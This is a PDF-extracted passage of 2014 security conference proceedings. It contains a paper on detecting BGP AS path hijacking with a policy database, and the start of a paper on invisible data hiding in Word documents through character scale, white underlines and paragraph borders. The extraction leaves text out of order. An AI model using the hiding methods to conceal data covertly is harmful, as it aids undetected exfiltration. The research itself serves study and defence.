behavioral approach,” in IEEE 3rd International on Advance Computing
Conference (IACC), 2013, pp. 388–393.
G. Usha and S. Bose, “Impact of gray hole attack on adhoc networks,”
in International Conference on Information Communication and Embedded Systems (ICICES), 2013, pp. 404–409.
Y. Guo and S. Perreau, “Detect DDoS flooding attacks in mobile ad
hoc networks,” International Journal of Security and Networks, vol. 5,
no. 4, Dec. 2010, pp. 259–269.
P. Joshi, “Security issues in routing protocols in MANETs at network
layer,” Procedia CS, vol. 3, 2011, pp. 954–960.
K. Sanzgiri and et al., “Authenticated routing for ad hoc networks,”
IEEE Journal On Selected Areas In Communications, vol. 23, 2005,
pp. 598–610.
P. Papadimitratos and Z. J. Haas, “Secure link state routing for mobile
ad hoc networks,” in Symposium on Applications and the Internet
Workshops. IEEE Computer Society, 2003, pp. 379–383.
M. G. Zapata, “Secure ad hoc on-demand distance vector routing,”
SIGMOBILE Mob. Comput. Commun. Rev., vol. 6, no. 3, jun 2002,
pp. 106–107.
P. Yi, Z. Dai, Y.-P. Zhong, and S. Zhang, “Resisting flooding attacks in
ad hoc networks,” in International Conference on Information Technology: Coding and Computing (ITCC), vol. 2, April 2005, pp. 657–662.
B.-C. Peng and C.-K. Liang, “Prevention techniques for flooding attacks
in ad hoc networks,” in 3rd Workshop on Grid Technologies and
Applications (WoGTA 06), Hsinchu, Taiwan, December 2006, pp. 657–
662 Vol. 2.
J.-H. Song, F. Hong, and Y. Zhang, “Effective filtering scheme against
rreq flooding attack in mobile ad hoc networks,” in Proceedings
of the Seventh International Conference on Parallel and Distributed
Computing, Applications and Technologies (PDCAT). Washington,
DC, USA: IEEE Computer Society, 2006, pp. 497–502.
V. Balakrishnan, V. Varadharajan, U. Tupakula, and M. Moe, “Mitigating flooding attacks in mobile ad-hoc networks supporting anonymous
communications,” in 2nd International Conference on Wireless Broadband and Ultra Wideband Communications (AusWireless), Aug 2007,
pp. 29–34.
R. Venkataraman, M. Pushpalatha, R. Khemka, and T. R. Rao, “Prevention of flooding attacks in mobile ad hoc networks,” in Proceedings
of the International Conference on Advances in Computing, Communication and Control (ICAC3). New York, NY, USA: ACM, 2009, pp.
525–529.
U. D. Khartad and R. K. Krishna, “Route request flooding attack using
trust based security scheme in MANET,” International Journal of Smart
Sensors and Ad Hoc Networks (IJSSAN), vol. 1, no. 4, 2012, pp. 27–33.
The Network Simulator NS-2, http://www.isi.edu/nsnam/ns/ [retrieved:
September, 2014].
R EFERENCES
[1]
[2]
[3]
[4]
A. Boukerche and et al., “Routing protocols in ad hoc networks: a
survey,” Computer Networks, vol. 55, no. 13, September 2011, pp.
3032–3080.
M. A. Abdelshafy and P. J. King, “Analysis of security attacks on AODV
routing,” in 8th International Conference for Internet Technology and
Secured Transactions (ICITST), London, UK, Dec 2013, pp. 290–295.
C. E. Perkins and E. M. Royer, “Ad-hoc on-demand distance vector
routing,” in Proceedings of the 2nd IEEE Workshop on Mobile Computing Systems and Applications, 1997, pp. 90–100.
M. A. Abdelshafy and P. J. King, “AODV & SAODV under attack:performance comparison,” in ADHOC-NOW 2014, LNCS 8487,
Benidorm, Spain, Jun 2014, pp. 318–331.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
19
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
The Policy-Based AS_PATH Verification to Monitor AS Path Hijacking
Je-Kuk Yun, Beomseok Hong
Yanggon Kim
Information Technology
Towson University
Towson, U.S.A.
jyun4, bhong1@students.towson.edu
Information Technology
Towson University
Towson, U.S.A.
ykim@towson.edu
Abstract— As the number of IP prefix hijacking incidents has
increased, many solutions are proposed to prevent IP prefix
hijacking, such as RPKI, BGPmon, Argus, and PHAS. Except
RPKI, all of the solutions proposed so far can protect ASes
only through the origin validation. However, the origin
validation cannot detect specified attacks that alter the
AS_PATH attribute, such as AS Insertion attack and Invalid
AS_PATH Data Insertion attack. In order to solve these
problems, SIDR proposed the RPKI using BGPSEC, but
BGPSEC is currently a work in progress. So, we propose
Secure AS_PATH BGP (SAPBGP) in which we monitor the
AS_PATH attribute in update messages whether each AS in
the AS_PATH attribute are connected to each other based on
our policy database collected from RIPE NCC repository. Our
analysis shows 4.57% of the AS_PATH attribute is invalid and
95.43% of the AS_PATH attribute is valid from the fifteenth of
April in 2014 to the eighth of June in 2014. In addition, the
performance test verifies that the SAPBGP can process all of
the live BGP messages coming from BGPmon in real time.
was some misdirected network traffic suspected of the manin-the-middle (MITM) attack in 2013 observed by Renesys.
In February 2013, global traffic was redirected to Belarusian
ISP GlobalOneBel before its intended destination and it
occurred on an almost daily basis. Major financial
institutions, governments, and network service providers
were affected by this traffic diversion in several countries
including the U.S. From the thirty first of July to the
nineteenth of August, Icelandic provider Opin Kerfi
announced origination routes for 597 IP networks owned by
a large VoIP provider in the U.S through Siminn, which is
one of the two ISPs that Opin Kerfi has. However, this
announcement was never propagated through Fjarskipti
which is the other one of the two ISPs. As a result, network
traffic was sent to Siminn in London and redirected back to
its intended destination. Several different countries in some
Icelandic autonomous systems and belonging to the Siminn
were affected. However, Opin Kerfi said that the problem
was the result of a bug in software and had been resolved [8].
In order to protect the AS path hijacking, the AS_PATH
attribute should not be manipulated. However, the BGP itself
cannot check whether the AS_PATH attribute has been
changed or not. If a routing hijacker manipulates the
AS_PATH attribute in a BGP message that is sent by another
router and forwards the manipulated BGP message to other
neighbors, the neighbors who receive the manipulated BGP
message can be a victim of AS path hijacking. Only Secure
Inter-Domain Routing (SIDR) working group proposed the
RPKI using BGPSEC to validate the AS_PATH attribute,
but BGPSEC is currently a work in progress [9]. In addition,
a study propounds that BGP armed with BGPSEC cannot be
secured because of BGP’s fundamental design [10].
We propose Secure AS_PATH BGP (SAPBGP) in which
the SAPBGP constructs its own policy-based database by
collecting RIPE NCC repository and checks the AS_PATH
attribute in BGP update messages whether or not the ASes
listed in the AS_PATH attribute are actually connected. For
the validation test with the real BGP messages, the SAPBGP
receives a live BGP stream from the BGPmon project [11].
In addition, we conduct the performance test of the SAPBGP
to measure the duration of the validation with the live BGP
messages.
In this paper, with the fact that BGP is vulnerable to
MITM attack, we describe an attack scenario and a solution
in Section 3. In Section 4, we introduce and explain the
SAPBGP in detail. We discuss the SAPBGP environment
and analyze the result of the SAPBGP validation and the
Keywords- border gateway protocol; interdomain routing;
network security; networks; AS path hijacking.
I.
INTRODUCTION
The Border Gateway Protocol (BGP) is the de-facto
protocol to enable large IP networks to form a single Internet
[1]. The main objective of BGP is to exchange Network
Layer Reachability Information (NLRI) among Autonomous
Systems (ASes) so that BGP routers can transfer their traffic
to the destination.
However, BGP itself does not have mechanisms to verify
if a route is valid because BGP speaker completely trusts
other BGP speakers. This lack of consideration of BGP
vulnerabilities often causes severe failures of Internet service
provision [2]. The most well-known threat of the failures is
the YouTube hijacking by Pakistan Telecom (AS17557) on
the 24th of February in 2008 [3]. In response to the
government’s order to block YouTube access within their
ASes, Pakistan Telecom announced a more specific prefix
than YouTube prefix. Then, one of Pakistan Telecom’s
upstream providers, PCCW Global (AS3491), forwarded the
announcement to other neighbors. As a result of this,
YouTube traffic from all over the world was misled to
Pakistan Telecom (AS17557) for two hours. In order to solve
these problems, many studies were conducted, such as
Resource Public Key Infrastructure (RPKI) [4], BGPmon
[5], Argus [6], and a Prefix Hijack Alert System (PHAS) [7].
While there are many studies to IP prefix hijacking, few
studies have been researched about AS path hijacking. There
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
20
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
performance test in Section 5. Lastly, we conclude the paper
in Section 6.
II.
RELATED RESEARCH
A. BGPsec
BGPsec is a mechanism to provide routing path security
for BGP route advertisements and a work in progress by
SIDR [9]. BGPsec relies on RPKI where the root of trust
consists of the Regional Internet Registries (RIRs), including
ARIN, LACNIC, APNIC, RIPE, and AFRINIC. Each of the
RIRs signs certificates to allocate their resources. RPKI
provides Route Origination Authorization (ROA) to ASes
that are authorized to advertise a specific prefix [12]. The
ROA contains the prefix address, maxlength, and AS number,
which certifies the specified AS has permission to announce
the prefixes. For routing path validation, each AS receives a
pair of keys, which are a private key and a public key, from
its RIR. Each AS speaker signs the routing path before
forwarding it to their neighbors.
B. BGPmon
BGPmon is a monitoring infrastructure, implemented by
Colorado State University that collects BGP messages from
various routers that are distributed and offers the BGP
messages as the routes for destinations are changed in realtime [5]. Any BGP speaker can be a source that offers realtime update messages if the BGP speaker is connected to
BGPmon. Currently, 9 BGP speakers are participated in the
BGPmon project as a source router. In addition, BGPmon
collects Multi-threaded Routing Toolkit (MRT) format [13]
live stream from the RouteViews project through indirect
peering. The MRT format defines a way to exchange and
export routing information through which researchers can be
provided BGP messages from any routers to analyze routing
information. Clients can be connected to the BGPmon via
telnet and receive the live BGP stream in real time.
C. RIPE NCC
RIPE NCC is one of the Regional Internet Registries
(RIRs) in charge of the Europe/Middle-East region. RIPE
NCC manages RIPE Data Repository that is a collection of
datasets, such as IP address space allocations and
assignments, routing policies, reverse delegations, and
contacts for scientific Internet research. The organizations or
individuals who currently hold Internet resources are
responsible for updating information in the database. As a
result, RIPE NCC can keep the Data Repository up to date
and provide database APIs so that data users can access the
RIPE data repository through web browsers or programs.
III.
BGP THREATS AND SOLUTION
In this section we introduce a scenario of the AS path
hijacking that leads to the MITM attack. In addition, we
discuss how the routing policy-based AS_PATH validation
is operated in order to prevent the AS path hijacking.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
A. Manipulating data in BGP updates
A BGP router inserts its own ASN into the AS_PATH
attribute in update messages when the BGP router receives
the update message from neighbors. However, the BGP
router can insert one or more ASNs into the AS_PATH
attribute in update messages other than its own ASN. In
addition, a BGP router might pretend as if the BGP router is
connected to a certain BGP router by manipulating data
contained in BGP updates.
Figure 1. Manipulating a BGP message
Figure 1 demonstrates an example of manipulating data
in BGP update messages. Suppose AS 400 has a connection
to AS 500 and creates a faked\ BGP announcement to
pretend that AS 400 received a BGP message originated by
AS 100 and forwarded the update message to AS 500 even
though AS 100 and AS 400 actually don’t have a BGP
connection. In terms of AS 500, the traffic heading for prefix
10.10.0.0/16 will choose AS 400 as the best path because AS
500 selects the shortest path and AS 400 is shorter than AS
300. Even if the AS 500 can conduct origin validation, the
AS 500 cannot prevent this attack because prefix and ASN
information is correct. As a result, AS 400 will have the
traffic heading for prefix 10.10.0.0 and might start another
attack using the traffic, such as a MITM attack.
B. Man-in-the-middle (MITM) attack
The man-in-the-middle attack is an active eavesdropping
in which the attacker secretly creates connections to the
victims and redirects large blocks of internet traffic between
the sources and the destinations as if the sources and
destinations communicate directly. In such a case, the
victims can only notice a little enlarged latency time because
the internet packets travel longer hops than normal. In the
meantime, the attacker can monitor and manipulate the
packets so that the attacker can create future chances to try
another attack.
Renesys monitors MITM attacks and its clients were
victims of route hijacking caused by MITM attacks for more
than 60 days. The victims are governments, Internet Service
Providers (ISP), financial institutions, etc.
21
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Figure 2. The architecture of the SAPBGP
C. Routing policy based AS_PATH Validation
RIPE NCC provides users with RIPE Data Repository that
contains BGP peer information. Through this information,
we can know if any ASes are connected to other ASes. This
peer information has been collected by either Routing
Information Service (RIS) or Internet Routing Registry
(IRR). RIS has collected and stored Internet routing data
from several locations all over the world since 2001.
Using peer information, the SAPBGP monitors live BGP
stream from BGPmon. For example, in Figure 1, suppose
that AS 400 pretends as if AS 400 is connected to AS 100,
and AS 400 creates a BGP message as if the BGP message is
coming from AS 100 and forwarding the BGP message.
Then, AS 500 cannot check AS 400 and AS 100 are
connected to each other even though the AS 500 can conduct
the origin validation. However, suppose that either AS 500
or one of AS 500’s neighbors is a BGPmon’s participant and
the SAPBGP can receive the live BGP stream related to AS
500. The AS_PATH attribute in the BGP stream should
contain AS_PATH-100, 400, 500. Then, the SAPBGP can
find that AS 100 and AS 400 are not connected to each other
according to the peer information collected from RIPE NCC
repository. As a result of this, an AS 500 administrator will
be alerted by the SAPBGP and realize AS 400 might be
trying the MITM attack to draw AS 500 traffic heading to
AS 100.
IV.
SECURE AS_PATH BGP
In this section, we introduce overall how the SASBGP
works and Figure 2 describes the architecture of the
SAPBGP.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
A. Constructing Database
We construct our own database by using API provided
by RIPE. We have collected, every day, all of the AS
imports and exports policies information since the eighteenth
of February in 2014. In addition, we have separated tables in
the database to keep the daily information as well as the
accumulated information by adding new exports and imports
to the existing exports and imports.
As of the sixth of June in 2014, there are 77,776 ASes in
the world. We sent queries to RIPE one by one. For example,
if a query is related to AS 1 then the result includes AS 1’s
export policies, imports polices, and prefixes in the form of
json. The SAPBGP parses the results so that the list of export
policies and import policies can be stored to AS 1’s record in
the table. As a result, a new table is created every day to
keep track of the daily policy information. In addition, the
accumulated table is updated by adding new policies if AS 1
adds new policies against other ASes. Figure 3 shows the
records from AS 10001 to AS 10005 in the policy table.
Figure 3. A screen capture of the policy table
B. Monitoring Live BGP Stream
BGPmon provides live BGP stream through telnet to the
public. So, whenever the routers that are connected to
22
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
BGPmon receives BGP update messages, BGPmon converts
BGP update messages to XML format messages and
propagates the XML format messages to their clients. Apart
from the BGP update message, the XML format message
includes timestamp, date time, BGPmon id, BGPmon
sequence number, and so on.
Currently, there are 9 participants that are directly
connected to BGPmon, such as AS 3043, AS 10876, AS
3257, AS 3303, AS 812, AS 5568, AS 14041, AS 28289,
and AS 12145. We measured the number of update messages
that BGPmon propagates for 1 hour on the twenty sixth of
February in 2014. Table I shows the minimum, maximum,
and average number of update messages per 10 seconds.
TABLE I.
Because of the difference of variation of BGP update
periodic time, some pairs of ASes can be more duplicated
than others.
Figure 4 shows the result of the AS_PATH monitoring
experiment through the SAPBGP from the eighteenth of
February in 2014 to the eighth of June in 2014. We
conducted the experiment once a week during that period.
The original data collected contains many duplicated results,
but the outcome in Figure 4 does not contain the duplications.
Our result shows 4.57% of the AS_PATH attribute is invalid
and 95.43% of the AS_PATH attribute is valid.
THE NUMBER OF UPDATE MESSAGES FROM BGPMON
The number of update messages per 10 seconds
Minimum
38
Maximum
1672
Average
119.43
After parsing the live BGP message, the SAPBGP
retrieves the ASN attribute and the AS_PATH attribute to
check whether ASes in the AS_PATH attribute are
connected to each other. Firstly, we compare the policy table
in the database that is collected one day before. If we cannot
find the pair, we compare the information from the
accumulated table. If we cannot find the pair from the table,
we consider the AS_PATH attribute as the suspicious
AS_PATH attribute. If we find the suspicious AS_PATH
attribute, we notify the AS network administrators of the
suspicious AS_PATH attribute.
V.
PERFORMACE TEST AND RESULT ANALYSIS
We explain the environment in which the SAPBGP
constructs its own database by collecting RIPE repository
and check the live BGP stream from BGPmon to check the
invalid AS_PATH attribute in the BGP message. In addition,
we conduct the performance test and analyze the result of the
performance test in this section.
Figure 4. The result of the AS_PATH monitoring experiment
Figure 5 illustrates a portion of the policy table of the
invalid ASes that the SAPBGP detected in the experiment.
The invalid ASes could signify either the AS holder does not
configure policies or the AS_PATH attribute was
manipulated by hijackers.
A. Experiment
We have constructed our database by daily collecting
BGP policy records from the RIPE repository since the
eighteenth of February in 2014. Based on our table, the
SAPBGP checked the live BGP stream from BGPmon.
TABLE II.
THE COMPARISON OF THE RESULTS
Original results
No duplication
Valid
230575
13490
Invalid
3931
656
Valid by the
accumulated
records
4508
205
Table II shows the comparison between the original
results and the result that does not contain duplications.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Figure 5. A portion of the policy table
23
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
B. Performance Test
The SAPBGP runs on a 3.40 GHz i5-3570 machine with
16 GB of memory running Windows 7. MySQL Ver. 14.14
Distrib 5.1.41 is used for the database. The SAPBGP is
implemented by JAVA to collect daily updates from RIPE,
to receive live BGP stream from BGPmon, and to validate
the BGP stream by comparing the AS_PATH attribute to our
database. The SAPBGP and database are located in the same
machine to reduce the connection latency between them.
in 2014. In addition, the result of performance test verifies
that the SAPBGP can process all of the live BGP messages
coming from BGPmon in real time. In the result of the
AS_PATH monitoring experiment, the ratio of invalid
AS_PATH attribute is high because some AS routers still do
not configure their policies. For the precise result of the
policy based AS_PATH validation, every router needs to
configure policies against its peers.
REFERENCES
[1]
[2]
[3]
[4]
[5]
[6]
[7]
Figure 6. The result of the performance test for the AS_PATH
validation
Figure 6 shows the AS_PATH validation time. The
validation time includes accessing database, retrieving the
specific AS record from a table, and comparing the
AS_PATH attribute to the AS’s record. It takes 256
microseconds, on average, to validate a pair of ASes.
According to Table 1, the maximum number of live BGP
messages for 10 seconds is 1672. So, the SAPBGP can
process all of the live BGP messages coming from BGPmon
in real time.
VI.
[9]
[10]
[11]
[12]
CONCLUSION
Even though many solutions are proposed to prevent IP
prefix hijacking, such as RPKI, BGPmon, Argus, and PHAS,
these solutions cannot protect the AS path hijacking except
RPKI. SIDR proposed the RPKI using BGPSEC but
BGPSEC is currently a work in progress. In order to monitor
the AS path hijacking, we propose Secure AS_PATH BGP
(SAPBGP) in which we monitor the AS_PATH attribute in
update messages whether each AS in the AS_PATH attribute
are connected to each other based on our policy database
collected from RIPE NCC repository. The result of the
AS_PATH validation test shows 4.57% of the AS_PATH
attribute is invalid and 95.43% of the AS_PATH attribute is
valid from the fifteenth of April in 2014 to the eighth of June
Copyright (c) IARIA, 2014.
[8]
ISBN: 978-1-61208-376-6
[13]
Y. Rekhter, “A Border Gateway Protocol 4 (BGP-4),” 2006,
RFC 4271.
S. Murphy, “BGP Security Vulnerabilities Analysis,” 2006,
RFC 4272.
Rensys Blog, Pakistan hijacks YouTube [Online]. Available:
http://www.renesys.com/blog/2008/02/pakistan_hijacks_yout
ube_1.shtml [Accessed February 2014].
T. Manderson, L. Vegoda, and S. Kent, “Resource Public Key
Infrastructure (RPKI) Objects Issued by IANA(Feb. 2012),”
2012,
[Online].
Available:
http://www.rfceditor.org/rfc/rfc6491.txt [Accessed January 2014].
BGPmon, Google’s services redirected to Romania and
Austria [Online]. Available: http://www.bgpmon.net/googlesservices-redirected-to-romania-and-austria
[Accessed
October 2013].
X. Shi, Y. Xiang, Z. Wang, X. Yin, and J. Wu., “Detecting
Prefix Hijackings in the Internet with Argus”, In Proc. of
ACM IMC 2012.
M. Lad, D. Massey, D. Pei, Y. Wu, B. Zhang, and L. Zhang,
“PHAS: A prefix hijack alert system,” 2006, In Proceedings
of the 15th conference on USENIX Security Symposium Volume 15 (USENIX-SS'06), Vol. 15, pp.153-166.
Renesys Blog, Targeted Internet Traffic Misdirection
[Online]. Available: http://www.renesys.com/2013/11/mitminternet-hijacking [Accessed January 2014].
M. Lepinski, Ed., and BBN, “BGPSEC Protocol
Specification,” Available: http://tools.ietf.org/html/draft-ietfsidr-bgpsec-protocol-08.
Q. Li, Y. Hu, and X. Zhang, “Even Rockets Cannot Make
Pigs Fly Sustainably: Can BGP be Secured with BGPsec?,”
2014.
The BGPmon project, http://bgpmon.netsec.colostate.edu,
[Accessed 6th July 2013].
M. Lepinski, S. Kent, and D. Kong, "A Profile for Route
Origin Authorizations (ROAs)," [Online]. Available:
http://tools.ietf.org/html/rfc6482, [Accessed December 2012].
L. Blunk, "Multi-Threaded Routing Toolkit (MRT) Routing
Information Export Format," RFC 6396 , 2011.
24
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
A New Property Coding in Text Steganography of Microsoft Word Documents
Ivan Stojanov, Aleksandra Mileva, Igor Stojanović
University of Goce Delčev
Štip, Macedonia
Email: {ivan.stojanov, aleksandra.mileva, igor.stojanovik}@ugd.edu.mk
Abstract—Electronic documents, similarly as printed documents,
need to be secured by adding some specific features that allow
efficient copyright protection, authentication, document tracking
or investigation of counterfeiting and forgeries. Microsoft Word
is one of the most popular word processors, and several methods
exist for embedding data specially in documents produced by
it. We present a new type of methods for hiding data in
Microsoft Word documents, named as Property coding, which
deploys properties of different document objects (e.g., characters,
paragraphs, and sentences) for embedding data. We give four
different ways of Property coding, which are resistant to save
actions, introduce very small overhead on the document size
(about 1%), can embed up to 8 bits per character, and of course,
are unnoticed by readers. Property coding belongs to format
based methods of text steganography.
Keywords–Data Hiding; Microsoft Word.
I. I NTRODUCTION
Steganography is the art of undetectably altering some
seemingly innocent carrier to embed or hide secret messages.
Modern digital steganography utilizes computers and new information technologies, and one can use an image, text, video,
audio, file, protocol header or payload, or similar, as a carrier.
Watermarking, on the other hand, is the art of imperceptibly
altering some carrier, to embed a message about that carrier.
Each steganographic and watermarking system consist of an
embedder and a detector, the carrier is called cover work,
and the result of embedding is called stego (watermarked)
work [1]. Information hiding (or data hiding) is a general term
encompassing a more wide range of problems, and it includes
steganography and watermarking also.
Text steganography refers to the hiding of information
within text (see surveys [2][3]). Text is one of the oldest media
used for hiding data, and before the time of digital steganography, letters, books, and telegrams were used to hide secret
messages within their texts. Also, text documents are the most
present digital media today, which can be found in the form
of newspapers, books, web pages, source codes, contracts,
advertisements, etc. So, development of text steganography
and steganalysis is very important. From one side, data hiding
methods in text documents are big threats to cybersecurity and
new communication tools for terrorists and other criminals.
On the other side, these methods can have legal application
in document tracking, copyright protection, authentication,
investigation of counterfeiting and forgeries, etc. [4][5][6].
Microsoft Word is one of the most popular document
and word processing software, which comes as a part of the
Microsoft Office package. It is attractive for average users
because of the easiness of text editing and richness of text
formatting features.
In this paper, we present four new methods for hiding
data in MS-Word documents. We use properties of different
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
document objects, like characters, paragraphs, and sentences,
for data hiding. Additionally, these techniques can be adjust
for using in the documents produced by other word processors,
like Apache OpenOffice, Corel WordPerfect, etc. Section II
is devoted to different techniques used in text steganography
and Section III gives several existing methods and techniques
specially designed for MS-Word documents. Our four new
methods are presented in Section IV, and experimental results
and discussion are given in Section V.
II. T EXT S TEGANOGRAPHY
There are three main categories of text steganography:
format based methods, random and statistical generation, and
linguistic methods [7].
A. Format based methods
Format based methods generally format and modify existing text to conceal the data. There are several different
techniques for hiding data in text documents presented bellow.
Some of them like line shift coding or inserting of spacial
characters can pass unnoticed by readers, but can be detected
by computer; and other like font resizing, can pass undetected
by computer, but human can detect it. Hidden information
usually can be destroyed for example by character recognition
programs.
1) Line Shift Coding: In line shift coding, each even line
is shifted by a small predetermined amount (e.g., 1/300 inch
and less) either up or down, representing binary one or zero,
respectfully [8][9][10]. The odd lines are used as control lines
for detection of shifting of the even lines, and their position
is static. In this way, the original document is not needed for
decoding.
2) Word Shift Coding: Similarly to line shifting coding, in
word shifting coding, each even word is shifted by a small
predetermined amount (e.g., 1/150 inch and less) left or right,
representing binary one or zero, respectfully [9][10]. Again,
each odd word serves as a control word, which is used for
measuring and comparing distances between words. Since the
word spacing in the original document is not uniform, the
original document is needed for decoding. Low, Maxemchuk,
Brassil, and O‘Gorman [8] use combination of line and word
shifting, and each even line additionally is divided in three
blocks of words and only middle block is shifted left or right.
In [11], line is divided in segments of consecutive words,
and neighbouring segments share one word. By shifting only
middle words of the segment, 1 or 2 bits can be coded per one
segment.
3) Feature Coding: In feature coding (or character coding),
the feature of some characters in the text are changed [9][10].
For example, change to an individual character‘s height or its
position relative to other characters; extending or shortening
25
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
of the horizontal line in the letter t; increasing or decreasing
the size of the dot in letters i and j, etc. The last technique
can be applied for 14 letters in Arabic alphabet [12]. Another
feature coding methods for Arabic alphabet [13][14] use the
redundancy in diacritics to hide information.
4) Open method: In this group of techniques, some special
characters are inserted in the cover text. For example, spaces
can be inserted at the end of each sentence, at the end of each
line, between words [15], or at the end of each paragraph [16].
A text processor can change the number of spaces and destroy
the hidden message. There are several software tools, which
implement some variants of the open method, like SNOW [17],
WhiteSteg [18], UniSpaCh [19] which uses Unicode space
characters, etc.
Other techniques [20][21], which can be put in this group,
use widening, shrinking or unchanging an inter-word space to
encode the text format.
5) Luminance Modulation Coding: This coding uses character luminance modulation for hiding data. Borges and Mayer
[22] embed data by individually altering the luminance of each
character from black to any value in the real-valued discrete
alphabet of cardinality S, so that each symbol represents log2 S
bits. One previous method [23], instead of whole character,
modulates the luminance of particular pixels from the characters in scanned text document for hiding bits. Similarly in
[24], quantization of the color intensity of each character is
used, in such a way the HVS cannot make the difference
between original and quantized characters, but it is possible
for a specialized reader. This technique works well on printed
documents, too.
B. Random and Statistical Generation
In methods of random and statistical generation, a new
text is generated, which tries to simulate some property of
normal text, usually by approximating some arbitrary statistical
distribution found in real text [7].
C. Linguistic Methods
Linguistic methods manipulate with lexical, syntactic, or
semantic properties of texts for hiding data, while their meanings are preserved as much as possible. Known linguistic
methods are syntactic and semantic methods.
With syntactic methods, data can be hidden within the
syntactic structure itself. They sometimes include changing
the diction and structure of text without significantly altering
meaning or tone. Some of them use punctuation, because there
are many circumstances where punctuation is ambiguous or
when mispunctuation has low impact on the meaning of the
text. For example, one can hide one or zero by putting or
not, a comma before ”and” [15]. One disadvantage is that
inconsistent use of punctuation is noticeable to the readers.
In Arabic language, there is one special extension character,
which is used with pointed letters, without effect on the
content. The authors of [25] suggest to use pointed letters with
extension as binary one and pointed letters without extension
as binary zero. Wayner [26] proposed Context-Free Grammars
(CFGs) to be used as a basis for generation of syntactically
correct stego texts. Another method [27] manipulates with
sentences by shifting the location of the noun and verb to
hide data.
Semantic methods change the words themselves. One
method uses the synonym substitution of words for hiding
information in the text [15]. Two different synonyms can be
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
used as binary one and zero. Similar is use of paraphrasing of
text for hiding messages [28], for example ”can” for binary 0,
and ”be able to” for binary 1. Another method [29] changes
word spelling, and in order to code zero or one, the US and
UK spellings of words are used. One example is the word
”color”, which has different spelling in UK (colour) and US
(color). Other semantic methods are given in [5][30]. Semantic
methods sometimes can alter the meaning of the sentence.
Different miscellaneous techniques that use typographical
errors, using of abbreviations and acronyms, free form formatting, transliterations, use of emoticons for annotating text with
feelings, mixed use of languages, and similar ones are given
in [31].
III.
E XISTING M ETHODS S PECIALLY D ESIGNED FOR
MS-W ORD D OCUMENTS
Besides the previous more general text steganographic
methods that can be applied, there are several methods for data
hiding, specially designed for Microsoft Word documents. The
most closest technique to ours, is usage of invisible characters,
suggested by Khairullah [32]. This technique sets foreground
color on invisible characters such as the space, the tab or the
carriage return characters, obtaining 24 bits per character.
Another technique, called Similar English Font Types
(SEFT) [33], use similar English fonts for hiding data. First,
three different similar fonts are chosen (e.g., Century751 BT,
CenturyOldStyle, CenturyExpdBT), and then, 26 letters and
space character are represented by triple of capital letters, each
in one of the chosen fonts.
Liu and Tsai [34] use Change Tracking technique for
hiding data in MS-Word documents. First, a cover document
is degenerated with different misspellings and other mistakes
usual for users, and then, corrections with Change Tracking
are added, so it seems like the document is the product of a
collaborative writing effort. The secret message is embedded
in the choices of degenerations using Huffman coding.
From MS-Office 2007, Microsoft has adopted a new format
of its files, and introduced the Office Open XML (OOXML)
format. In order to guarantee higher level of privacy and
security, it has also presented the feature Document Inspector,
which is used for quickly identifying and removing of any
sensitive, hidden and personal information. Castiglione et al.
present in [35] four new methods for hiding data in MS-Word
documents, which resist the Document Inspector analysis. Two
of them (with different compression algorithms or revision
identifier values) exploit particular features of the OOXML
standard, have null overhead, but do not resist to save actions.
Other two (with zero dimension image or macro), resist to save
actions, but they have an overhead.
IV. P ROPERTY C ODING
We present four new format based methods for hiding data
in MS-Word documents, that use some text formattings that
are invisible for human eye. They use different choices for
some text properties, and because of that, we can name them
as Property Codings. Methods presented in [32] and [33] can
be also classified as Property codings, because they use font
color and font type properties of a given character, respectfully.
The novelty of our methods is twofold. First, we introduce
other character properties that can be used for hiding data,
and second, we show that properties of document objects other
than characters (e.g., paragraphs and sentences), can be used
for hiding data.
26
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
A. Method 1 - Character Scale
When we work in MS-Word, by default text character scale
is set to 100%. Increasing the character scale will make your
letters larger and scale further apart with more white space
between each character. Decreasing the scale will shrink and
squish letters closer together. Big differences in character scale
are noticeable for human reader. But, if some of the characters
are with scale 99% and others with 101%, human eye can not
make the differences.
So, in the first method, we use scale of 99% to represent
binary one, and scale of 101% to represent binary zero. Scale
of 100% can be used for non-encoded characters. In this
way, in the cover document, we can hide maximum the same
number of bits as the number of characters in the document.
Variants of this method are also possible. For example,
instead of using two very close scale values, one can uses
four very close scale values (e.g., 97%, 98%, 99% and 101%),
and every value will represents two binary digits. In this way,
we duplicate the hiding capacity of the same document, and
still normal reader won’t notice it. Another variant is to change
scale on every word, not on every character.
B. Method 2 - Character Underline
One common feature of MS-Word is character underlining.
There are 16 different underline styles, with potential of
carrying 4 bits, and 224 different underline colors. Because
we need underlining to go unnoticed by the user, we use 16
variants of white color, with potential of carrying 4 bits.
In this way, we can hide 8 bits per character. Some
characters, as g, j, p, q, and y, have noticeable changes in
the look when we use every type of underlining. Because of
that, we excluded this group of 5 characters from hiding data.
C. Method 3 - Paragraph Borders
In MS-Word, one can add border to the paragraph, sentence, picture, table, individual page, etc. Border can be
left, right, top, bottom, etc. There are 24 different border
styles, and only two of them (wdLineStyleEmboss3D and
wdLineStyleEngrave3D) are noticeable to human reader. We
can use 16 out of the rest 22, with potential of carrying 4 bits.
In this method, we use left and right borders on paragraph
for hiding data. Again, we use 16 variants of white color for
borders. Each paragraph in the cover document can hide 16
bits, in the following way - 4 bits from left border style, 4 bits
from left border color, 4 bits from right border style, and 4 bits
from right border color. This is done in our implementation.
We can increase hiding capacity of this method, by using
different border width also. There are 13 border styles with
9 different border widths, two border styles with 6 different
border widths, three border styles with 5 different border
widths, one border style with 8 different border widths, one
border style with 2 different border widths, and two border
styles with 1 border width, or summary 155 possibilities.
Potentially, we have 7 bits per combination border style/width.
